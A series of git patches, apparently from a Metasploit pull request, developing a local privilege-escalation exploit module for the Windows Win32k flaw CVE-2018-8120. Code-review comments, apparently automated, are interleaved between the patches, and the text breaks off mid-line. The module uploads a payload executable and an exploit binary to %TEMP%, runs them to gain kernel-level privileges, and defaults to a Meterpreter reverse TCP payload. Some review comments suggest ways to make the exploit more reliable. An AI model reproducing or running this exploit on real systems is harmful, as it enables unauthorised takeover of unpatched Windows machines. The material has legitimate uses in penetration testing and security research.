'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], @@ -31,7 +33,7 @@ class MetasploitModule < Msf::Post 'Anton Cherepanov', # Vulnerability discovery 'Dhiraj Mishra ' # Metasploit module ], - 'DisclosureDate' => 'Aug 05 2018', + 'DisclosureDate' => 'May 9 2018', 'Arch' => [ARCH_X64, ARCH_X86], 'SessionTypes' => ['meterpreter'], 'License' => MSF_LICENSE From 8e0d10492539c01ebc92b0cc9d98725283f11385 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 19:39:52 +0530 Subject: [PATCH 07/39] Spaces at EOL --- modules/post/windows/escalate/ms18_8120_win32k_privsec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 36c8d954cf..44c1c4ba99 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb 
@@ -1,4 +1,4 @@ -## +## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## From ad59a522984fd2b3e24430e9a581f8f816d20986 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 22:56:45 +0530 Subject: [PATCH 08/39] Updating --- .../windows/escalate/ms18_8120_win32k_privsec.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 44c1c4ba99..88b3f12318 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Post def initialize(info = {}) super(update_info(info, - 'Name' => 'Wink32.sys fails to handle objects in memory (Win32k Elevation of Privilege Vulnerability)', + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who @@ -30,6 +30,7 @@ class MetasploitModule < Msf::Post 'Author' => [ 'unamer', # Exploit PoC + 'bigric3', # Analysis and exploit 'Anton Cherepanov', # Vulnerability discovery 'Dhiraj Mishra ' # Metasploit module ], @@ -41,7 +42,7 @@ class MetasploitModule < Msf::Post register_options( [ - OptString.new('POCCMD', [true, 'The command to run from poc.sct']), + OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120']), ]) end 
@@ -55,22 +56,21 @@ class MetasploitModule < Msf::Post temprexe end - def write_file_to_target(temprexe,rexe) + def write_file_to_target(temprexe,rexe) fd = session.fs.file.new(temprexe, "wb") fd.write(rexe) fd.close end - def create_payload_from_file(exec) + def create_payload_from_file(exec) print_status("Reading Payload from file #{exec}") ::IO.read(exec) end - def run + def run rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" print_status("exe name is: #{rexename}") poccmd = datastore['POCCMD'] - cmdcheck = datastore['CMDCHECK'] rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') raw = create_payload_from_file rexe From 428e1594d578e4a6ff13c05f48a205960aa30528 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Thu, 20 Sep 2018 22:31:10 +0530 Subject: [PATCH 09/39] Updating --- .../escalate/ms18_8120_win32k_privsec.rb | 21 +++++++++---------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 88b3f12318..15ce061137 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -22,10 +22,10 @@ class MetasploitModule < Msf::Post [ ['BID', '104034'], ['CVE', '2018-8120'], - ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], - ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], ['URL', 'https://github.com/bigric3/cve-2018-8120'], - ['URL', 'https://github.com/unamer/CVE-2018-8120'] + ['URL', 'https://github.com/unamer/CVE-2018-8120'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'] ], 'Author' => [ 
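Review bot: `create_payload_from_file` reads an executable with `::IO.read(exec)`, which opens the file in text mode; on a Windows framework host that can translate line endings or stop at an EOF byte and hand a corrupted binary to the upload, so `::File.binread(exec)` is the safer call. In `write_file_to_target`, `fd.close` is skipped when `fd.write` raises; closing in an `ensure` avoids leaking the remote handle. The context line in run builds the path from 'exploits', 'CVE-2018-0824' while the file and the module are for CVE-2018-8120; the binary patch's own path is not visible in this part of the page, so this is either a typo here or a misnamed data directory and should be checked.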
@@ -42,18 +42,18 @@ class MetasploitModule < Msf::Post register_options( [ - OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120']), + OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), ]) end def write_exe_to_target(rexe, rexename) begin - print_warning("writing to %TEMP%") + print_warning("Writing file to temp") temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end - print_good("Persistent Script written to #{temprexe}") - temprexe + print_good("File path on remote system: #{temprexe}") + temprexe end def write_file_to_target(temprexe,rexe) @@ -63,20 +63,20 @@ class MetasploitModule < Msf::Post end def create_payload_from_file(exec) - print_status("Reading Payload from file #{exec}") + print_status("Reading file from: #{exec}") ::IO.read(exec) end def run rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - print_status("exe name is: #{rexename}") + print_status("EXE name is: #{rexename}") poccmd = datastore['POCCMD'] rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) - print_status('Starting module..') + print_status('Initiating module...') print_line command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename @@ -87,6 +87,5 @@ class MetasploitModule < Msf::Post command_output = cmd_exec(command) print_line(command_output) print_line - end end From 4fea65170c85348137d78b67963a8e2dd45bb261 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Thu, 20 Sep 2018 22:50:31 +0530 Subject: [PATCH 10/39] Updating --- .../escalate/ms18_8120_win32k_privsec.rb | 34 +++++++++---------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 15ce061137..3e96ea6354 100644 
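Review bot: In write_exe_to_target the `begin` … `end` pair kept by the first hunk has no `rescue` or `ensure`, so it changes nothing and only suggests error handling that is not there. Either remove it, leaving the three statements directly in the method body, or give it a `rescue` that reports the failed write with `print_error` before re-raising. While touching these lines, `write_file_to_target(temprexe,rexe)` is missing the space after the comma that the rest of the file uses.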
--- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -48,7 +48,7 @@ class MetasploitModule < Msf::Post def write_exe_to_target(rexe, rexename) begin - print_warning("Writing file to temp") + print_status("Writing file to temp") temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end @@ -68,24 +68,24 @@ class MetasploitModule < Msf::Post end def run - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - print_status("EXE name is: #{rexename}") - poccmd = datastore['POCCMD'] + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + print_good("EXE name is: #{rexename}") + poccmd = datastore['POCCMD'] - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe - script_on_target = write_exe_to_target(raw, rexename) + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) - print_status('Initiating module...') - print_line + print_good('Initiating module...') + print_line - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - print_status("Location of CVE-2018-8120.exe is: #{command}") - command += " " - command += "#{poccmd}" - print_status("Executing command : #{command}") - command_output = cmd_exec(command) - print_line(command_output) - print_line + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + print_good("Location of CVE-2018-8120.exe is: #{command}") + command += " " + command += "#{poccmd}" + print_good("Executing command : #{command}") + command_output = cmd_exec(command) + print_line(command_output) + print_line end end From 4116e8e205b841e8e7e3c6439d37197710c77f9e Mon Sep 17 00:00:00 2001 
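Review bot: The second hunk switches every progress message in run to `print_good`, including 'Initiating module...' and 'Executing command : ...', which are printed before anything has succeeded. In the sample output documented earlier on this page `[+]` marks results and `[*]` marks progress, so anyone reading a log of the run will take these lines as outcomes. Keep `print_status` for the progress lines, for example `print_status("Executing command : #{command}")`, and reserve `print_good` for a confirmed result such as the returned command output.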
From: Dhiraj Mishra Date: Sat, 22 Sep 2018 01:00:44 +0530 Subject: [PATCH 11/39] Fixing --- modules/post/windows/escalate/ms18_8120_win32k_privsec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 3e96ea6354..82066052a9 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -82,8 +82,8 @@ class MetasploitModule < Msf::Post command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename print_good("Location of CVE-2018-8120.exe is: #{command}") command += " " - command += "#{poccmd}" - print_good("Executing command : #{command}") + command += "\"#{poccmd}\"" + print_good("Executing command: #{command}") command_output = cmd_exec(command) print_line(command_output) print_line From 25ed5dc3a6731a7bd2a907aca70223b9117b2e6f Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Sat, 22 Sep 2018 15:22:30 +0530 Subject: [PATCH 12/39] Moving to exploits/windows/local --- .../windows/local/ms18_8120_win32k_privsec.rb | 91 +++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 modules/exploits/windows/local/ms18_8120_win32k_privsec.rb diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb new file mode 100644 index 0000000000..82066052a9 --- /dev/null +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb 
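Review bot: Wrapping the option as `"\"#{poccmd}\""` only holds while POCCMD contains no double quote; a value with an embedded `"` closes the argument early and the remainder is parsed as separate arguments. The executable path built from %TEMP% is still appended unquoted, so a profile directory containing a space splits the command as well. Quote the path the same way and reject or escape embedded quotes in POCCMD before building the string; how `cmd_exec` hands the string to the remote shell is not visible here, so the exact escaping should be checked against it. The later exploit hunk joins two paths with `command += "#{cmd}"` and has the same unquoted-path problem.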
@@ -0,0 +1,91 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + Rank = GoodRanking + + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', + 'Description' => %q{ + This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 + when the Win32k component fails to properly handle objects in memory. An attacker who + successfully exploited this vulnerability could run arbitrary code in kernel mode. An + attacker could then install programs; view, change, or delete data; or create new + accounts with full user rights.}, + 'References' => + [ + ['BID', '104034'], + ['CVE', '2018-8120'], + ['URL', 'https://github.com/bigric3/cve-2018-8120'], + ['URL', 'https://github.com/unamer/CVE-2018-8120'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'] + ], + 'Author' => + [ + 'unamer', # Exploit PoC + 'bigric3', # Analysis and exploit + 'Anton Cherepanov', # Vulnerability discovery + 'Dhiraj Mishra ' # Metasploit module + ], + 'DisclosureDate' => 'May 9 2018', + 'Arch' => [ARCH_X64, ARCH_X86], + 'SessionTypes' => ['meterpreter'], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), + ]) + end + + def write_exe_to_target(rexe, rexename) + begin + print_status("Writing file to temp") + temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + write_file_to_target(temprexe,rexe) + end + print_good("File path on remote system: #{temprexe}") + temprexe + end + + def write_file_to_target(temprexe,rexe) + fd = session.fs.file.new(temprexe, "wb") + fd.write(rexe) + 
fd.close + end + + def create_payload_from_file(exec) + print_status("Reading file from: #{exec}") + ::IO.read(exec) + end + + def run + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + print_good("EXE name is: #{rexename}") + poccmd = datastore['POCCMD'] + + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) + + print_good('Initiating module...') + print_line + + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + print_good("Location of CVE-2018-8120.exe is: #{command}") + command += " " + command += "\"#{poccmd}\"" + print_good("Executing command: #{command}") + command_output = cmd_exec(command) + print_line(command_output) + print_line + end +end From db15340306783b76136b1d599497f372d69a9009 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Sat, 22 Sep 2018 15:30:51 +0530 Subject: [PATCH 13/39] Fixing --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 82066052a9..f6a8fafd54 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class MetasploitModule < Msf::Post +class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File From 783789d098840397059c85bb7a1347a870315ee8 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Thu, 4 Oct 2018 15:01:06 +0530 Subject: [PATCH 14/39] Updating --- .../windows/local/ms18_8120_win32k_privsec.rb | 81 ++++++++++++------- 1 file changed, 54 insertions(+), 27 deletions(-) 
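Review bot: The diffstat for this patch shows only a file creation, so the original under modules/post/windows/escalate stays in the tree and the two copies will diverge; the move should delete the old path in the same commit. The added file also keeps `include Msf::Post::Windows::Registry` although nothing in its 91 lines calls a registry helper, so the mixin can be dropped. The data path still uses the 'CVE-2018-0824' directory name for a CVE-2018-8120 binary, which is worth settling before the module is published under a new location.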
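Review bot: Changing the superclass to `Msf::Exploit::Local` is not sufficient on its own, because the class body added in the previous patch still implements `run` and takes its command from the POCCMD option, and it declares no 'Platform', 'Targets' or 'DefaultTarget'. A local exploit module is expected to provide `exploit` and that metadata, so as committed this state presumably loads but cannot be used as the class it now claims to be. The class line is the only line in this hunk; the rest of the class lies outside it. Squashing this change with the one that introduces `exploit` would avoid leaving a broken intermediate commit.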
diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index f6a8fafd54..bb5c871269 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -3,11 +3,16 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +require 'msf/core/exploit/exe' + class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking + include Msf::Post::Common include Msf::Post::File - include Msf::Post::Windows::Registry + include Msf::Post::Windows::Priv + include Msf::Exploit::EXE + include Msf::Post::Windows::Process def initialize(info = {}) super(update_info(info, @@ -35,25 +40,36 @@ class MetasploitModule < Msf::Exploit::Local 'Dhiraj Mishra ' # Metasploit module ], 'DisclosureDate' => 'May 9 2018', - 'Arch' => [ARCH_X64, ARCH_X86], - 'SessionTypes' => ['meterpreter'], - 'License' => MSF_LICENSE + 'Arch' => [ARCH_X64], + 'Platform' => 'win', + 'Payload' => + { + 'Space' => 4096, + 'DisableNops'=> true + }, + 'Targets' => + [ + ['Windows 7 x64', { 'Arch' => ARCH_X64 }] + ], + 'SessionTypes' => ['meterpreter'], + 'DefaultTarget' => 0, + 'License' => MSF_LICENSE )) register_options( [ - OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), + OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ]) ]) end def write_exe_to_target(rexe, rexename) begin - print_status("Writing file to temp") + vprint_warning("writing to %TEMP%") temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end - print_good("File path on remote system: #{temprexe}") - temprexe + vprint_good("File path: #{temprexe}") + temprexe end def write_file_to_target(temprexe,rexe) 
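Review bot: The second hunk registers a READFILE option, 'Read a remote file: ' with default 'C:\\Windows\\boot.ini', but the exploit method added in the next hunk never reads `datastore['READFILE']`; the option was already removed once earlier in this series and comes back here unused. Delete the `OptString.new('READFILE', ...)` entry, and the whole `register_options` call if no option remains. The first hunk has the same kind of leftover: `Msf::Post::Windows::Priv` and `Msf::Post::Windows::Process` are included, yet no method from either is called in the code visible on this page.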
@@ -63,29 +79,40 @@ class MetasploitModule < Msf::Exploit::Local end def create_payload_from_file(exec) - print_status("Reading file from: #{exec}") + vprint_status("Reading Payload from file #{exec}") ::IO.read(exec) end + + def exploit + @payload_name = datastore['PAYLOAD'] + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + vprint_status("exe name is: #{rexename}") + + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) + + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + vprint_status("Location of CVE-2018-8120.exe is: #{command}") - def run - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - print_good("EXE name is: #{rexename}") - poccmd = datastore['POCCMD'] + command += " " + command += "#{cmd}" - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe - script_on_target = write_exe_to_target(raw, rexename) + vprint_status("Executing command : #{command}") + command_output = cmd_exec(command) + print_line(command_output) + print_line('') - print_good('Initiating module...') - print_line - - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - print_good("Location of CVE-2018-8120.exe is: #{command}") - command += " " - command += "\"#{poccmd}\"" - print_good("Executing command: #{command}") - command_output = cmd_exec(command) - print_line(command_output) - print_line end + attr_reader :payload_name + attr_reader :payload_exe + attr_reader :payload_path end 
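Review bot: In the new `exploit` method, `script_on_target` already holds the remote path returned by `write_exe_to_target`, yet the next line rebuilds the same path into `command` with a second `expand_path("%TEMP%")` call. The payload path comes from a third lookup, `getenv('TEMP')`. Resolve the directory once and reuse the returned value, e.g. `command = "#{script_on_target} #{cmd}"`, so the paths cannot drift apart. `@payload_name` is set and `attr_reader :payload_exe` / `attr_reader :payload_path` are declared, but nothing in this hunk assigns or reads them; remove them or add a comment naming the consumer.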
From 9f8f0b8885bb9a6ffffc5011f854ac0b25b46b9c Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Thu, 4 Oct 2018 15:41:46 +0530 Subject: [PATCH 15/39] Fixing carriage/spaces return at EOL --- .../windows/local/ms18_8120_win32k_privsec.rb | 41 ++++++++----------- 1 file changed, 18 insertions(+), 23 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index bb5c871269..38d1b50bb1 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -40,16 +40,16 @@ class MetasploitModule < Msf::Exploit::Local 'Dhiraj Mishra ' # Metasploit module ], 'DisclosureDate' => 'May 9 2018', - 'Arch' => [ARCH_X64], - 'Platform' => 'win', - 'Payload' => + 'Arch' => [ARCH_X64], + 'Platform' => 'win', + 'Payload' => { 'Space' => 4096, 'DisableNops'=> true }, - 'Targets' => + 'Targets' => [ - ['Windows 7 x64', { 'Arch' => ARCH_X64 }] + ['Windows 7 x64', {'Arch' => ARCH_X64 }] ], 'SessionTypes' => ['meterpreter'], 'DefaultTarget' => 0, 
@@ -82,37 +82,32 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("Reading Payload from file #{exec}") ::IO.read(exec) end - + def exploit - @payload_name = datastore['PAYLOAD'] - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - vprint_status("exe name is: #{rexename}") - - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - + @payload_name = datastore['PAYLOAD'] + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + vprint_status("exe name is: #{rexename}") + + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename vprint_status("Location of CVE-2018-8120.exe is: #{command}") command += " " command += "#{cmd}" - vprint_status("Executing command : #{command}") command_output = cmd_exec(command) print_line(command_output) print_line('') end - attr_reader :payload_name - attr_reader :payload_exe - attr_reader :payload_path end From da525db6e976066faacb9c57e9649b70b10f404e Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Sun, 7 Oct 2018 01:54:20 +0530 Subject: [PATCH 16/39] Updating --- .../windows/local/ms18_8120_win32k_privsec.rb | 43 ++++++++++++------- 1 file changed, 27 insertions(+), 16 deletions(-) 
diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 38d1b50bb1..0980a9fdf3 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -62,9 +62,24 @@ class MetasploitModule < Msf::Exploit::Local ]) end + def validate_target + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') + end + + if sysinfo['OS'] =~ /XP/ + fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') + end + end + def write_exe_to_target(rexe, rexename) begin - vprint_warning("writing to %TEMP%") + vprint_warning("Writing file to %TEMP%") + print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end 
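Review bot: `validate_target` is added here but nothing visible calls it. The `exploit` method in the next hunk of this commit still opens with `@payload_name = datastore['PAYLOAD']` and goes straight to writing files, so the already-elevated, x86 and Windows XP guards never run. Make `validate_target` the first statement of `exploit`, so an unsupported host is rejected before a kernel-level binary is launched on it. The XP branch reports `Failure::Unknown`; `Failure::NoTarget` would match the x86 branch and describe the condition accurately. A header comment such as `# Aborts when the session is already SYSTEM, the host is x86, or the OS is Windows XP` would document the contract.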
@@ -79,24 +94,22 @@ class MetasploitModule < Msf::Exploit::Local end def create_payload_from_file(exec) - vprint_status("Reading Payload from file #{exec}") + vprint_status("Reading payload from file #{exec}") ::IO.read(exec) end def exploit @payload_name = datastore['PAYLOAD'] - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - vprint_status("exe name is: #{rexename}") - + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + vprint_status("EXE's name is: #{rexename}") exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename @@ -106,8 +119,6 @@ class MetasploitModule < Msf::Exploit::Local command += "#{cmd}" vprint_status("Executing command : #{command}") command_output = cmd_exec(command) - print_line(command_output) - print_line('') - + print_good(command_output) end end From b08c5ad5974c16c7ad6d10b675ea0c254bf4e17c Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Mon, 8 Oct 2018 13:24:48 +0530 Subject: [PATCH 17/39] Adding DefaultOptions --- .../windows/local/ms18_8120_win32k_privsec.rb | 91 +++++++++---------- 1 file changed, 44 insertions(+), 47 deletions(-) 
diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 0980a9fdf3..193fabda06 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb 
@@ -14,53 +14,48 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Windows::Process - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', - 'Description' => %q{ +def initialize(info={}) + super(update_info(info, { + 'Name' => 'Windows ClientCopyImage Win32k Exploit', + 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new - accounts with full user rights.}, - 'References' => - [ - ['BID', '104034'], - ['CVE', '2018-8120'], - ['URL', 'https://github.com/bigric3/cve-2018-8120'], - ['URL', 'https://github.com/unamer/CVE-2018-8120'], - ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], - ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'] - ], - 'Author' => - [ + accounts with full user rights. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'unamer', # Exploit PoC 'bigric3', # Analysis and exploit 'Anton Cherepanov', # Vulnerability discovery 'Dhiraj Mishra ' # Metasploit module ], - 'DisclosureDate' => 'May 9 2018', - 'Arch' => [ARCH_X64], - 'Platform' => 'win', - 'Payload' => - { - 'Space' => 4096, - 'DisableNops'=> true + 'Arch' => [ ARCH_X64 ], + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => { + 'EXITFUNC' => 'thread', + 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }, - 'Targets' => - [ - ['Windows 7 x64', {'Arch' => ARCH_X64 }] + 'Targets' => [ + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], - 'SessionTypes' => ['meterpreter'], - 'DefaultTarget' => 0, - 'License' => MSF_LICENSE - )) - - register_options( - [ - OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ]) - ]) - end + 'Payload' => { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => [ + ['BID', '104034'], + ['CVE', '2018-8120'], + ['URL', 'https://github.com/unamer/CVE-2018-8120'], + ['URL', 'https://github.com/bigric3/cve-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'] + ], + 'DisclosureDate' => 'May 9 2018', + 'DefaultTarget' => 0 + })) def validate_target if is_system? @@ -79,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Local def write_exe_to_target(rexe, rexename) begin vprint_warning("Writing file to %TEMP%") - print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") - temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + print_good("Exploiting SetImeInfoEx 